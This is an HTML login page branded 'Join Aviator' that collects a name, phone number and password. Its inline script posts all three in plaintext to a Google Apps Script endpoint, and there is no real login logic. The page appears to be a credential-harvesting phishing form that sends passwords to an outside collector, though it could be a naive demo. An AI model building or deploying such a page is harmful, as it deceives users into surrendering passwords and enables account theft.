<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Login Form</title>
</head>
<body>
  <h2>Login</h2>
  <form id="loginForm">
    <input type="text" name="name" placeholder="Enter Name"><br><br>
    <input type="text" name="phone" placeholder="Enter Phone"><br><br>
    <input type="password" name="password" placeholder="Enter Password"><br><br>
    <button type="submit">Join Aviator</button>
  </form>

  <script>
    const scriptURL = 'https://script.google.com/macros/s/AKfycbwqwF8DTPSsLm9VsnxHJmDJD12WAqtNAvwb8l0AVQk/exec';
    const form = document.getElementById('loginForm');

    form.addEventListener('submit', e => {
      e.preventDefault();

      const formData = {
        name: form.name.value,
        phone: form.phone.value,
        password: form.password.value
      };

      fetch(scriptURL, {
        method: 'POST',
        body: JSON.stringify(formData)
      })
      .then(response => alert('Data submitted successfully!'))
      .catch(error => alert('Error!', error.message));
    });
  </script>
</body>
</html>
